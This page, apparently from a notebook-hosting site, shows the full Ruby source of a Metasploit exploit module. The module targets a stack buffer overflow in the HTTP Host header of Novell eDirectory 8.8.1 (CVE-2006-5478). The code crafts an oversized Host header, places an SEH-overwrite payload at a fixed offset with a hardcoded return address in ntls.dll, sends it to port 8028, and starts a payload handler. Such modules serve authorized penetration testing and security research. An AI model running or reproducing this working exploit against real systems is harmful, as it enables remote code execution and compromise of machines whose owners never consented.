Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/edirectory_host.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'Novell eDirectory NDS Server Host Header Overflow',14'Description' => %q{15This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.16The web interface does not validate the length of the17HTTP Host header prior to using the value of that header in an18HTTP redirect.19},20'Author' => 'MC',21'License' => MSF_LICENSE,22'References' =>23[24['CVE', '2006-5478'],25['OSVDB', '29993'],26['BID', '20655'],27],28'DefaultOptions' =>29{30'EXITFUNC' => 'seh',31},32'Payload' =>33{34'Space' => 600,35'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",36'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff",37},38'Platform' => 'win',39'Targets' =>40[41[ 'Novell eDirectory 8.8.1', { 'Ret' => 0x10085bee } ], # ntls.dll42],43'Privileged' => true,44'DisclosureDate' => '2006-10-21',45'DefaultTarget' => 0))4647register_options([Opt::RPORT(8028)])48end4950def exploit51connect5253sploit = "GET /nds HTTP/1.1" + "\r\n"54sploit << "Host: " + rand_text_alphanumeric(9, payload_badchars)55sploit << "," + rand_text_alphanumeric(719, payload_badchars)56seh = generate_seh_payload(target.ret)57sploit[705, seh.length] = seh58sploit << "\r\n\r\n"5960print_status("Trying target #{target.name}...")6162sock.put(sploit)6364handler65disconnect66end67end686970